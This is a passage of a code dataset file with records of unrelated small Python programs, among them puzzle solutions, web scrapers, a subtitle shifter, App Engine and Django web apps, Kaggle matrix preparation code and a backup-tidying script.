adapters\n\n\nif __name__ == '__main__':\n\n difference_1 = 0\n difference_3 = 0\n current_joltage = 0\n adapters = read_adapters('data\\\\day_10.txt')\n for adapter in adapters:\n\n if current_joltage + 1 == adapter:\n difference_1 += 1\n current_joltage = adapter\n elif current_joltage + 3 == adapter:\n difference_3 += 1\n current_joltage = adapter\n else:\n continue\n\n print(difference_1 * (difference_3+1))\n","sub_path":"2020/days/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"555465418","text":"# import time\n#\n# import aiohttp\n# import asyncio\n# from src.utils import read_links_txt\n#\n# links = read_links_txt('../input/images_links.txt')\n#\n# start = time.perf_counter()\n#\n# async def get(url):\n# async with aiohttp.ClientSession() as session:\n# async with session.get(url,\n# ssl=False\n# ) as 
response:\n# return response.status\n#\n# loop = asyncio.get_event_loop()\n#\n# tasks = [get(link) for link in links]\n# results = loop.run_until_complete(asyncio.gather(*tasks))\n# print(f'Elapsed:{time.perf_counter()-start}')\n# print(\"Results: %s\" % results)\n\nimport os\nimport pathlib\nimport time\nimport aiohttp\nimport aiofiles\nimport asyncio\n\nfrom bs4 import BeautifulSoup\n\nfrom src.utils import read_links_txt, get_file_name_from_url\n\n# links = read_links_txt('../input/images_links.txt')\\\n\nimg_dir = '../img/async'\n\npathlib.Path(img_dir).mkdir(parents=True, exist_ok=True)\n\n\nasync def links_scraper(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, ssl=False) as resp:\n soup = BeautifulSoup(await resp.text(), \"html.parser\")\n image = soup.findAll(\"img\")\n d = [i['src'] for i in image]\n link = []\n for i in d:\n if (i[-4:]) == '.jpg':\n link.append(i)\n yield link\n\n\nstart = time.perf_counter()\n\n\nasync def download(url):\n async with aiohttp.ClientSession() as session:\n async with session.get(url, ssl=False) as response:\n f = await aiofiles.open(os.path.join(img_dir, get_file_name_from_url(url)), mode='wb')\n await f.write(await response.read())\n await f.close()\n\n\nasync def app_main():\n async for i in links_scraper('https://wallpaperscraft.ru/'):\n for g in i:\n await download(g)\n\n\nloop = asyncio.get_event_loop()\n# tasks = [download(link) async for link in links_scraper(\"https://www.pinterest.com\")]\n# loop.run_until_complete(asyncio.gather(*tasks))\nloop.run_until_complete(app_main())\nprint(f'Elapsed:{time.perf_counter() - start}')\n","sub_path":"src/async_parser.py","file_name":"async_parser.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638520833","text":"from collections import Counter \nimport time\n\nstart = time.time()\ns = \"\"\nres = []\ntemp = []\nindex = 0\nwith open('sample1.txt') as f:\n for i in f:\n s = s + i\ns = s.replace(',','').strip()\ns = s.replace('.','').strip()\nwords = s.split(' ')\nfor i in range(len(words)):\n r = set()\n for j in range(i+1,len(words)):\n if(words[j] not in temp and words[i] != words[j]):\n if(Counter(words[i].lower()) == Counter(words[j].lower())): # check if it is anagram\n temp.append(words[j]) # if yes add it to an temporary list\n r.add(words[i])\n r.add(words[j]) # add anagrams to a set \n if(len(r)!=0):\n res.append(r)\nres = res[::-1]\nf = \"\"\n\nfor i in res:\n for j in i:\n f = f + \",\" + j\n f = f[1:len(f)]\n print(f)\n f = \"\"\n\nprint(\"program took \" + str(time.time()-start) + \"secs\")","sub_path":"anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"88124816","text":"from datetime import datetime, timedelta\n\n\ndef tiempo(hora):\n hora = hora.replace(' ', '')\n datetime_object = datetime.strptime(hora, '%H:%M:%S,%f')\n X = 13\n result = datetime_object - timedelta(seconds=X)\n result = ','.join(str(result.time()).split('.'))\n return result[:-3]\n\n\nentrada = open('/Users/gerardorodriguez/Downloads/MyFlow/subtitulos.srt')\nsalida = open('/Users/gerardorodriguez/Downloads/MyFlow/subtitulos_salida.srt', 'w+')\nfor row in entrada.readlines():\n row = row.strip().split('-->')\n try:\n final = row[1]\n final = tiempo(final)\n comienzo = row[0]\n comienzo = tiempo(comienzo)\n salida.write(str(comienzo) + ' --> ' + str(final) 
+ '\\n')\n except Exception as ex:\n salida.write(row[0] + '\\n')\nsalida.close()","sub_path":"subtitulos.py","file_name":"subtitulos.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"265541461","text":"\"\"\" \nExamples of documentation used in FIT1008/FIT1054/FIT2085.\n\nThis module demonstrates the level of documentation for modules and\nfunctions that we will require in the unit. Examples for classes,\nexceptions and testing will appear later in the unit.\n\nFurther to Further example of good documentation under Important \nDocuments on Moodle for more details.\n\"\"\"\n\n__author__ = \"Maria Garcia de la Banda\"\n\nfrom typing import List, Union, TypeVar # this is how we import things\nT = TypeVar('T')\n\n\ndef max_age(age1: int, age2: int) -> int:\n return age1 if age1 > age2 else age2\n\n\ndef has_a_negative(list: List[int]) -> bool:\n \"\"\" Checks if the list has a negative number.\n\n :pre: The list must contain elements\n :post: The list should not be modified\n :complexity: Best O(1) if negative number appears first, worst O(N),\n where N is the length of list, when all are >= 0\n \"\"\"\n assert len(list) > 0, \"List must contain elements\"\n \n for item in list:\n if item < 0:\n return True\n return False\n\n\ndef string_to_number(string: str) -> Union[int, float]:\n \"\"\" Converts a string into an int or a float.\n :raises ValueError: if the string is neither an int nor a float\n \"\"\"\n try:\n return int(string)\n except ValueError:\n return float(string)\n\n\n\ndef disjoint(list1: List[T], list2: List[T]) -> bool:\n \"\"\" Checks if two lists have no elements in common.\n\n :param arg1: often student in a Monash Activity (lecture, lab, etc)\n :param arg2: often students in a different Monash Activity \n :complexity: Best O(1) if their first element is the same, worst \n O(N1*N2)*O(==), where NX is the length of listX, and \n O(==) is the complexity of ==, when they are disjoint\n \"\"\"\n for item1 in list1:\n for item2 in list2:\n if item1 == item2:\n return False\n return True \n\n\ndef main():\n \"\"\" Calls all functions with some inputs and prints the result.\"\"\"\n print(max_age(-1, 3)) \n print(max_age(-1, -1))\n print(has_a_negative([1, 2, 3, -4]))\n print(has_a_negative([]))\n print(string_to_number(\" 14 \"))\n print(string_to_number(\" -14.6 \"))\n print(disjoint([1, 2, 3],[1]))\n print(disjoint([1, 2, 3],[4, 5, 6, 7]))\n print(string_to_number(\" 1 2 \")) # should throw ValueError\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"example_documentation.py","file_name":"example_documentation.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461698895","text":"#!/usr/bin/env python\nimport wsgiref.handlers\nimport os\nimport re\nimport logging\nimport functools\nimport yaml\nimport ConfigParser\n\nfrom google.appengine.api import memcache\n\nfrom models import Post, PostQueries, PostUpdates\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp import template\n\nconfig = ConfigParser.ConfigParser()\nconfig.read('config.cfg')\n\ndef admin(method):\n @functools.wraps(method)\n def wrapper(self, *args, **kwargs):\n user = users.get_current_user()\n if not user:\n if self.request.method == \"GET\":\n return self.redirect(users.create_login_url(self.request.uri))\n return self.error(403)\n elif not 
users.is_current_user_admin():\n return self.error(403)\n else:\n return method(self, *args, **kwargs)\n return wrapper\n\nclass BaseRequestHandler(webapp.RequestHandler):\n \n def error_page(self,code=404):\n self.error(code)\n self.render(\"error/%i.html\" % code)\n \n def render(self,template_file, context={}):\n global config\n path = os.path.join(os.path.dirname(__file__), template_file)\n context['google_analytics_key'] = config.get('blog', 'google_analytics_key')\n self.response.out.write(template.render(path, context))\n \n\nclass MainHandler(BaseRequestHandler):\n \n def get(self):\n context = {\n \"posts\": PostQueries().get_all_posts(),\n }\n self.render('base.html', context)\n\nclass BlogRSSHandler(BaseRequestHandler):\n \n def get(self):\n posts = PostQueries().get_all_posts()\n last_modified_utc = PostQueries().get_last_modified_utc_time()\n context = {\n \"posts\": posts,\n \"last_modified\": last_modified_utc\n }\n self.response.headers.__delitem__(\"Content-Type\")\n self.response.headers.add_header(\"Content-Type\", \"text/xml\")\n self.render('blog/rss.html', context)\n \n \n\nclass BlogHandler(BaseRequestHandler):\n \n def get(self):\n post = PostQueries().get_post_from_path(self.request.path)\n context = {\n \"post\": post,\n }\n self.render('base_post.html', context)\n\nclass EditBlogHandler(BaseRequestHandler):\n \n @admin\n def get(self):\n post = PostQueries().get_post_from_title(self.request.get('title'))\n context = {\n \"post\": post,\n }\n self.render('blog/edit_post_form.html', context)\n \n @admin\n def post(self):\n post = PostQueries().get_post_from_title(self.request.get('title'))\n post.title = self.request.get('title')\n post.content = self.request.get('content')\n \n post = PostUpdates().update(post)\n context = {\n \"post\" : post,\n }\n self.render('blog/post_edited.html', context)\n \n \n\nclass NewBlogHandler(BaseRequestHandler):\n \n @admin\n def get(self):\n self.render('blog/new_post_form.html')\n \n @admin\n def post(self):\n \n post = Post(title = self.request.get('title'),\n content = self.request.get('content'),\n tags = 1 and [str.strip() for str in self.request.get('tags').split(',')] or [])\n \n post = PostUpdates().add(post)\n context = {\n \"post\" : post,\n }\n self.render('blog/new_post_created.html', context)\n \n\nclass ProjectsHandler(BaseRequestHandler):\n \n def get(self):\n m = re.search('projects/instagreader/instagreader_(\\d+)_(.*?).user.js', self.request.path)\n if (m != None):\n context = { \"v\": m.group(1), \"k\": m.group(2) }\n self.render('projects/instagreader/instagreader.user.js', context)\n else:\n template = self.request.path[1:]\n template = re.sub(r'^(.*)/$', r'\\1/index.html', template)\n if (re.match(r'.*\\w$', template) and not(re.match(r'.*\\.html$', template))):\n template = template + \"/index.html\"\n self.render(template)\n \nclass AdminHandler(BaseRequestHandler):\n\t@admin\n\tdef get(self):\n\t\tmemcache.flush_all()\n\t\tself.response.out.write('

memcache flushed

')\n\nclass NotFoundHandler(BaseRequestHandler):\n \n def get(self):\n self.error_page(404)\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n \n application = webapp.WSGIApplication(\n [\n ('/', MainHandler),\n ('/blog/', MainHandler),\n ('/blog/new', NewBlogHandler),\n ('/blog/edit/*', EditBlogHandler),\n (r'/blog/rss/?', BlogRSSHandler),\n (r'/blog/\\d\\d\\d\\d/\\d\\d/\\d\\d/.+', BlogHandler),\n (r'/projects/?.*', ProjectsHandler),\n (r'/admin/?.*', AdminHandler),\n (r'.*', NotFoundHandler)\n ],\n debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"496758693","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\n\nfrom feedbacks import views\n\nfrom sdacademy.views import index, contact, student_list, student_detail\nfrom courses.views import course_list_index\n\n\nurlpatterns = patterns('',\n url(r'^polls/', include('polls.urls', namespace=\"polls\")),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^quadratic/', include('quadratic.urls')),\n url(r'^$', course_list_index, name=\"index\"),\n url(r'^index/', course_list_index, name=\"index\"),\n url(r'^feedback/', views.FeedbackView.as_view(), name=\"feedback\"),\n #url(r'^$', include('courses.urls', namespace='courses')),\n #url(r'^index/', include('courses.urls', namespace='courses')),\n url(r'^courses/', include('courses.urls', namespace='courses')),\n url(r'^students/', include('students.urls', namespace='students')),\n url(r'^coaches/', include('coaches.urls', namespace='coaches')),\n url(r'^contact/', contact, name=\"contact\"),\n url(r'^student_list/', student_list, name=\"student_list\"),\n url(r'^student_detail/', student_detail, name=\"student_detail\"),\n)\n","sub_path":"sdacademy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"164316408","text":"import asyncio\nimport curses\nfrom random import choice, randint\n\nfrom curses_tools import discover_active_area\n\n\nasync def blink(canvas, row, column, symbol='*'):\n while True:\n canvas.addstr(row, column, symbol, curses.A_DIM)\n for i in range(randint(1, 18)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol)\n for i in range(randint(1, 8)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol, curses.A_BOLD)\n for i in range(randint(1, 3)):\n await asyncio.sleep(0)\n\n canvas.addstr(row, column, symbol)\n for i in range(randint(1, 3)):\n await asyncio.sleep(0)\n\n\ndef prepare_blink_coroutines(\n canvas, amount_of_stars: int = 100, stars_symbols='+*.:'\n) -> list:\n active_area = discover_active_area(canvas)\n\n return [\n blink(\n canvas=canvas,\n # We don't want to place stars at borderline, so 1 row/column cap\n row=randint(\n active_area['border_limit_top'], active_area['border_limit_bottom'] - 1\n ),\n column=randint(\n active_area['border_limit_left'], active_area['border_limit_right'] - 1\n ),\n symbol=choice(stars_symbols),\n )\n for _ in range(amount_of_stars)\n ]\n","sub_path":"animations_code/background_animation.py","file_name":"background_animation.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"158320495","text":"# 
coding: utf-8\r\n__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'\r\n\r\n\r\nfrom a00_common_functions import *\r\nfrom scipy.sparse import csr_matrix\r\n\r\n\r\ndef get_tagged_data():\r\n # load tagged data\r\n tagged = dict([(p[:-4] + '.jpg', w) for _, p, w in pd.read_csv(INPUT_PATH + 'train.csv').to_records()])\r\n # print(\"Total tagged images: \", len(tagged))\r\n return tagged\r\n\r\n\r\ndef get_real_answers(ids):\r\n tagged = get_tagged_data()\r\n answ = []\r\n for id in ids:\r\n try:\r\n answ.append(tagged[id + '.jpg'])\r\n except:\r\n answ.append(tagged[list(tagged.keys())[0]])\r\n return np.array(answ)\r\n\r\n\r\ndef get_single_score(preds, id, compare_ids, real_answ, real_labels, thr):\r\n print_num = 5\r\n verbose = False\r\n\r\n # Remove same id\r\n cond = np.where(np.isin(compare_ids, [id]))\r\n preds[cond] = -1\r\n\r\n sorted_args = np.argsort(preds)[::-1]\r\n probs = preds[sorted_args]\r\n ids = compare_ids[sorted_args]\r\n train_labels = real_labels[sorted_args]\r\n\r\n if verbose:\r\n print(real_answ)\r\n print(probs[:print_num])\r\n print(ids[:print_num])\r\n print(train_labels[:print_num])\r\n train_names = []\r\n for t in train_labels[:10]:\r\n train_names.append(t)\r\n print(train_names)\r\n\r\n answ = []\r\n cond = probs > thr\r\n res = dict()\r\n prob1 = probs[cond]\r\n train_labels1 = train_labels[cond]\r\n for j, p in enumerate(prob1):\r\n lbl = train_labels1[j]\r\n if lbl not in res:\r\n res[lbl] = 0\r\n res[lbl] += p\r\n res = sort_dict_by_values(res)\r\n if verbose:\r\n print(res)\r\n\r\n for j in range(min(len(res), 5)):\r\n answ.append(res[j][0])\r\n if len(answ) < 5:\r\n answ.append('new_whale')\r\n for j, p in enumerate(probs):\r\n lbl = train_labels[j]\r\n if lbl not in answ:\r\n answ.append(lbl)\r\n if len(answ) >= 5:\r\n break\r\n if verbose:\r\n print(str(answ))\r\n\r\n score = apk([real_answ], answ, k=5)\r\n return score, answ\r\n\r\n\r\ndef get_score_from_matrix(m, base_order_valid, base_order_train, answ_valid, answ_train, thr):\r\n new_whales_count = 0\r\n scores = []\r\n for i in range(m.shape[0]):\r\n preds = m[i].copy()\r\n score, answ1 = get_single_score(preds, base_order_valid[i], base_order_train, answ_valid[i], answ_train, thr)\r\n # print('ID: {} Score: {} Avg score: {} Real answ: {} Answ: {}'.format(ids_valid[i], score, score_sum / (i + 1), answ_valid[i], answ1))\r\n if answ1[0] == 'new_whale':\r\n new_whales_count += 1\r\n scores.append(score)\r\n return scores, new_whales_count\r\n\r\n\r\ndef concat_fold_matrix(matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train):\r\n matrix_arr_full = []\r\n base_order_valid = np.concatenate(base_order_valid)\r\n # check if base_order train is the same\r\n for i in range(4):\r\n for j in range(i+1, 4):\r\n if tuple(base_order_train[i]) != tuple(base_order_train[j]):\r\n print('Error base_order_train!')\r\n exit()\r\n if tuple(answ_train[i]) != tuple(answ_train[j]):\r\n print('Error answ_train!')\r\n exit()\r\n base_order_train = base_order_train[0]\r\n answ_valid = np.concatenate(answ_valid)\r\n answ_train = answ_train[0]\r\n m = []\r\n for fold in range(4):\r\n part = np.array(matrix_arr[fold])\r\n m.append(part)\r\n m = np.concatenate(m)\r\n matrix_arr_full.append(m)\r\n matrix_arr = np.array(matrix_arr_full)\r\n print(matrix_arr.shape)\r\n print(base_order_valid.shape)\r\n print(base_order_train.shape)\r\n print(answ_valid.shape)\r\n print(answ_train.shape)\r\n return matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train\r\n\r\n\r\ndef zerofy_same_ids(matrix_arr, 
base_order_valid, base_order_train):\r\n for i in range(matrix_arr.shape[1]):\r\n # Remove same id\r\n cond = np.where(np.isin(base_order_train, [base_order_valid[i]]))\r\n matrix_arr[:, i, cond] = 0\r\n return matrix_arr\r\n\r\n\r\ndef remove_tst_data(matrix_arr, base_order_train, answ_train):\r\n s = list(pd.read_csv(INPUT_PATH + 'sample_submission.csv')['Image'].values)\r\n\r\n print('Initial matrix shape: {}'.format(matrix_arr.shape))\r\n use_ids = []\r\n total = 0\r\n for i in range(len(base_order_train)):\r\n if base_order_train[i] + '.jpg' not in s:\r\n use_ids.append(i)\r\n else:\r\n total += 1\r\n use_ids = np.array(use_ids)\r\n print('Removed IDs: {}'.format(total))\r\n\r\n matrix_arr = matrix_arr[:, :, use_ids]\r\n base_order_train = base_order_train[use_ids]\r\n answ_train = answ_train[use_ids]\r\n print('Updated matrix shape: {}'.format(matrix_arr.shape))\r\n return matrix_arr, base_order_train, answ_train\r\n\r\n\r\ndef create_matrix_train(tables_path, out_path):\r\n EPS = 0.00001\r\n print('Go for: {}'.format(tables_path))\r\n matrix_arr = []\r\n base_order_valid = []\r\n base_order_train = []\r\n answ_valid = []\r\n answ_train = []\r\n scores_full = []\r\n for fold in range(4):\r\n matrix_arr.append([])\r\n base_order_valid.append(None)\r\n base_order_train.append(None)\r\n answ_valid.append([])\r\n answ_train.append([])\r\n\r\n for fold in range(4):\r\n file = tables_path\r\n file = file.replace('*', str(fold))\r\n print('Read {}'.format(file))\r\n data = load_from_file_fast(file)\r\n order_valid = np.array(data[0])\r\n order_train = np.array(data[1])\r\n m = data[2]\r\n\r\n order_valid = np.array([x[:-4] for x in order_valid])\r\n order_train = np.array([x[:-4] for x in order_train])\r\n\r\n asort_valid = np.argsort(order_valid)\r\n asort_train = np.argsort(order_train)\r\n print(m.shape)\r\n m = m[asort_valid, :]\r\n m = m[:, asort_train]\r\n\r\n base_order_valid[fold] = order_valid[asort_valid]\r\n base_order_train[fold] = order_train[asort_train]\r\n answ_valid[fold] = get_real_answers(base_order_valid[fold])\r\n answ_train[fold] = get_real_answers(base_order_train[fold])\r\n\r\n scores, nw = get_score_from_matrix(m, base_order_valid[fold], base_order_train[fold], answ_valid[fold], answ_train[fold], thr=0.99)\r\n scores_full += scores\r\n matrix_arr[fold] = m\r\n print('Fold score: {:.6f}'.format(np.array(scores).mean()))\r\n\r\n print('Overall score: {:.6f}'.format(np.array(scores_full).mean()))\r\n # Concatenate all folds\r\n matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train = \\\r\n concat_fold_matrix(matrix_arr, base_order_valid, base_order_train, answ_valid, answ_train)\r\n\r\n # Remove pseudolabel test data\r\n matrix_arr, base_order_train, answ_train = remove_tst_data(matrix_arr, base_order_train, answ_train)\r\n\r\n # Set 0 to same IDs\r\n matrix_arr = zerofy_same_ids(matrix_arr, base_order_valid, base_order_train)\r\n\r\n # Prepare final dict\r\n base_order_valid = np.array([x + '.jpg' for x in base_order_valid])\r\n base_order_train = np.array([x + '.jpg' for x in base_order_train])\r\n\r\n print(base_order_valid)\r\n print(base_order_train)\r\n\r\n # Prepare sparse matrix\r\n matrix_arr = matrix_arr[0]\r\n matrix_arr[matrix_arr < EPS] = 0.0\r\n matrix_arr = csr_matrix(matrix_arr)\r\n print(matrix_arr.shape)\r\n\r\n out = dict()\r\n out['row_names'] = base_order_valid\r\n out['col_names'] = base_order_train\r\n out['overall_score'] = np.array(scores_full).mean()\r\n out['val_vs_train_mat_sparse'] = matrix_arr\r\n\r\n # Save to file\r\n 
save_in_file_fast(out, out_path)\r\n\r\n\r\ndef create_matrix_tst(tables_path, out_path):\r\n    EPS = 0.00001\r\n\r\n    out_path = out_path[:-4] + '-test.pkl'\r\n\r\n    matrix_arr = []\r\n    file = tables_path\r\n    print('Read {}'.format(file))\r\n    data = load_from_file_fast(file)\r\n\r\n    order_valid = np.array(data[0])\r\n    order_train = np.array(data[1])\r\n    m = data[2]\r\n\r\n    # order_valid = np.array([x[:-4] for x in order_valid])\r\n    # order_train = np.array([x[:-4] for x in order_train])\r\n\r\n    asort_valid = np.argsort(order_valid)\r\n    asort_train = np.argsort(order_train)\r\n    print(m.shape)\r\n    m = m[asort_valid, :]\r\n    m = m[:, asort_train]\r\n\r\n    base_order_valid = order_valid[asort_valid]\r\n    base_order_train = order_train[asort_train]\r\n\r\n    matrix_arr.append(m.copy())\r\n\r\n    matrix_arr = np.array(matrix_arr)\r\n    print(matrix_arr.shape)\r\n\r\n    intersection = (set(base_order_valid) & set(base_order_train))\r\n    print('Intersection of IDs:', len(intersection))\r\n\r\n    # Set 0 to same IDs\r\n    matrix_arr = zerofy_same_ids(matrix_arr, base_order_valid, base_order_train)\r\n\r\n    # Prepare sparse matrix\r\n    matrix_arr = matrix_arr[0]\r\n    matrix_arr[matrix_arr < EPS] = 0.0\r\n    matrix_arr = csr_matrix(matrix_arr)\r\n    print(matrix_arr.shape)\r\n\r\n    out = dict()\r\n    out['row_names'] = base_order_valid\r\n    out['col_names'] = base_order_train\r\n    # name = os.path.basename(out_path).split('-')[2]\r\n    out['test_vs_train_mat_sparse'] = matrix_arr\r\n\r\n    # Save to file\r\n    save_in_file_fast(out, out_path)\r\n\r\n\r\ndef get_matrix_list():\r\n    matrix_list = [\r\n        [\r\n            # Overall score: 0.964212\r\n            OUTPUT_PATH + 'seamese_net_v5_rgb_densenet121_512px/full_valid_vs_full_train_matrix_fold_*.pkl',\r\n            OUTPUT_PATH + 'seamese_net_v5_rgb_densenet121_512px/full_test_vs_train_matrix_avg.pkl',\r\n            FEATURES_PATH + 'cv-analysis-fs14-LB959-densenet121-512px-sparse.pkl',\r\n        ],\r\n        [\r\n            # Overall score: 0.963513\r\n            OUTPUT_PATH + 'seamese_net_v6_rgb_seresnext50_384px/full_valid_vs_full_train_matrix_fold_*.pkl',\r\n            OUTPUT_PATH + 'seamese_net_v6_rgb_seresnext50_384px/full_test_vs_train_matrix_avg.pkl',\r\n            FEATURES_PATH + 'cv-analysis-fs16-LB959-seresnext50-384px-sparse.pkl',\r\n        ],\r\n    ]\r\n    return matrix_list\r\n\r\n\r\nif __name__ == '__main__':\r\n    matrix_list = get_matrix_list()\r\n    start_time = time.time()\r\n    for m in matrix_list:\r\n        create_matrix_train(m[0], m[2])\r\n    for m in matrix_list:\r\n        create_matrix_tst(m[1], m[2])\r\n    print('Time: {:.0f} sec'.format(time.time() - start_time))\r\n","sub_path":"code/r20_prepare_matrices_for_ensemble.py","file_name":"r20_prepare_matrices_for_ensemble.py","file_ext":"py","file_size_in_byte":10176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"494678322","text":"n = int(input())\nx, y = 1, 1\nplans = input().split()\n\n# Movement offsets for each direction\ndx = [0, 0, -1, 1]\ndy = [-1, 1, 0, 0]\nmove_type = ['L', 'R', 'U', 'D']\n\nfor plan in plans:\n    # Get the coordinates after the move\n    for i in range(len(move_type)):\n        if plan == move_type[i]:\n            nx = x + dx[i]\n            ny = y + dy[i]\n    # Ignore moves that would leave the N x N grid\n    if nx < 1 or ny < 1 or nx > n or ny > n:\n        continue\n    x, y = nx, ny\nprint(x, y)\n","sub_path":"이코테/구현/상하좌우.py","file_name":"상하좌우.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"313491938","text":"import requests\nfrom bs4 import BeautifulSoup, NavigableString, Tag\nimport csv\n\nsoup_objects = []\n\n\nbase_url = 'https://search.naver.com/search.naver?&where=news&query=%EA%B4%91%EC%A3%BC%EC%9D%B8%EA%B3%B5%EC%A7%80%EB%8A%A5%EC%82%AC%EA%B4%80%ED%95%99%EA%B5%90&sm=tab_pge&sort=0&photo=0&field=0&reporter_article=&pd=0&ds=&de=&docid=&nso=so:r,p:all,a:all&mynews=0&cluster_rank=69&start='\n\nend_url = '&refresh_start=0'\n# final_page = input('How many pages?? : ')\n# final_page = int(final_page)\n\n\nfor i in range(1, 102, 10):\n    start_num = i\n\n    URL = base_url + str(start_num) + end_url\n\n    response = requests.get(URL)\n\n    soup = BeautifulSoup(response.text, 'html.parser')\n    soup_objects.append(soup)\n\nfor soup in soup_objects:\n\n    news_selection = soup.select(\n        'div[id=wrap] > div[id=container] > div[id=content] > div[id=main_pack] > div.news.mynews.section._prs_nws > ul[class=type01] > li')\n\n    for news in news_selection:\n        a_tag = news.select_one('dl>dt>a')\n        news_title = a_tag['title']\n        news_link = a_tag['href']\n\n        news_data = {\n            \"title\" : news_title,\n            \"hyperlink\" : news_link\n        }\n\n        with open('./naver_news.csv', 'a', encoding='utf-8-sig', newline='') as csvfile:\n            fieldnames = ['title', 'hyperlink']\n            csvwriter = csv.DictWriter(csvfile, fieldnames = fieldnames)\n            csvwriter.writerow(news_data)\n\n","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"630851494","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 18 00:56:23 2018\n\n@author: paris\n\"\"\"\n\nsmaller=1\nbigger=2\nlist_fibo=[]\n\nwhile bigger<4000000:\n    if bigger%2==0:\n        list_fibo.append(bigger)\n\n    new=smaller+bigger\n    smaller=bigger\n    bigger=new\n\nprint(sum(list_fibo))","sub_path":"Week01/Problem02/psarikhani_02.py","file_name":"psarikhani_02.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"645112399","text":"# tidy the working folder where backups are created. keep only the last num_backups_to_keep files, provided\n# that they have been backed up to backup_folder.\nimport os\nimport glob\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nworking_folder = \"/home/pi/.octoprint/data/backup\"\nbackup_folder = \"/mnt/nasty_backup\"\nnum_backups_to_keep = 3\n\nassert(os.path.exists(backup_folder))\nassert(os.path.exists(working_folder))\n\n# move to working folder and get a backup file listing\nos.chdir(working_folder)\nfiles = glob.glob(\"*.zip\")\n\n# sort files by modification date (ascending)\nfiles.sort(key=os.path.getmtime)\n\n# find the files to delete. 
we will keep the most recent ones\ndel_files = files[:-num_backups_to_keep]\n\n# check if these files have been copied to the mount point\nbackup_files = glob.glob(os.path.join(backup_folder,\"*.zip\"))\nbackup_files = [os.path.basename(x) for x in backup_files]\ndel_files = [x for x in del_files if x in backup_files]\nnot_backed_up_files = [x for x in files if x not in backup_files]\n\nlogging.info(\"Not backed up: \\n\" + \"\\n\".join(not_backed_up_files))\nlogging.info(\"To delete: \\n\" + \"\\n\".join(del_files))\n\n# now delete the files\nfor file in del_files:\n if os.path.exists(file):\n os.remove(file)\n logging.info(\"Deleted \" + file)\n\nlogging.info(\"Backup tidying complete\")\n\n","sub_path":"tidy_folder.py","file_name":"tidy_folder.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"29273852","text":"# Copyright 2014 The Chromium Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the LICENSE file.\n\nfrom master import master_config\nfrom master.factory import chromeos_factory\n\ndefaults = {}\n\nhelper = master_config.Helper(defaults)\nB = helper.Builder\nF = helper.Factory\n\n# CrOS ASan bots below.\ndefaults['category'] = '4chromeos asan'\n\n_ASAN_SCHEDULER_NAME = 'chromium_src_asan'\nhelper.Scheduler(_ASAN_SCHEDULER_NAME, branch='master', treeStableTimer=60)\n\ndef Builder(dname, sname, flavor, root, board):\n fname = '%s-%s' % (sname, flavor)\n B('%s (%s) Asan' % (dname, sname),\n factory=fname,\n gatekeeper='crosasantest',\n builddir='%s-tot-chromeos-%s-asan' % (flavor, board),\n scheduler=_ASAN_SCHEDULER_NAME,\n notify_on_missing=True)\n F(fname,\n chromeos_factory.CbuildbotFactory(\n buildroot='/b/cbuild/%s' % root,\n pass_revision=True,\n params='%s-tot-asan-informational' % board).get_factory())\n\n\nBuilder('Chromium OS', 'x86', 'chromium', 'shared_external', 'x86-generic')\nBuilder('Chromium OS', 'amd64', 'chromium', 'shared_external', 'amd64-generic')\n\ndef Update(_config, _active_master, c):\n return helper.Update(c)\n","sub_path":"masters/master.chromiumos.chromium/master_asan_cfg.py","file_name":"master_asan_cfg.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"445278684","text":"#coding: utf-8\nfrom flask_wtf import Form\nfrom wtforms import StringField,IntegerField,SelectField, DateTimeField\n\n\nclass RuleForm(Form):\n category = StringField('category')\n rule = StringField('rule')\n threshold = 